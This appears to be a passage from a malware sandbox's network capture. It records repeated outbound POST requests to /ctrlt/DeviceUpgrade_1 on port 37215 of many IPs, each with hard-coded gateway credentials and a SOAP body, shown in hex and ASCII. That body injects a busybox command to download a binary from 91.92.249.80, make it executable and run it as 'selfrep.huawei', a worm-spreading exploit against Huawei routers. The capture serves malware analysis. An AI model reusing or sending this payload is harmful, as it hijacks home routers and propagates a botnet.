                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1560192.168.2.2347602157.217.23.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.487380028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1561192.168.2.2350694132.184.9.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.487457037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1562192.168.2.2341976157.59.241.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.487483978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1563192.168.2.235097017.143.120.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.487504959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1564192.168.2.235776050.148.31.6437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.487539053 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1565192.168.2.2357684197.182.80.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.487955093 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1566192.168.2.2349596157.88.217.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.496673107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1567192.168.2.2344952157.170.75.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.496681929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1568192.168.2.2345648157.24.157.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.496709108 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1569192.168.2.2345424157.94.68.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.496723890 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 